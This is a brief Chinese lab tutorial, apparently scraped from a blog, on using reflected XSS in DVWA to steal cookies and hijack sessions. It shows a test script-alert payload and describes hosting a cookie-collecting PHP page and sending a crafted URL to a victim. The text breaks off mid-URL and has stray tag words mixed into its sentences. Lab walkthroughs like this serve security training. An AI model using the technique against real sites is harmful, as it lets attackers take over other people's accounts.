dvwa中 利用反射型xss獲取cookie進行會話的劫持演示

首先打開dvwa,設置安全等級爲low:php 輸入<script>alert(11)</script>證實彈窗:web 編寫獲取cookie的代碼cookie.php,並將其放在一個web服務器上,這裏我就放在http://127.0.0.1/dvwa/下面:安全 構造以下URL,併發送給被攻擊者:服務器 原始URL: http://location/dvwa/vulnerabilities/x
相關文章
相關標籤/搜索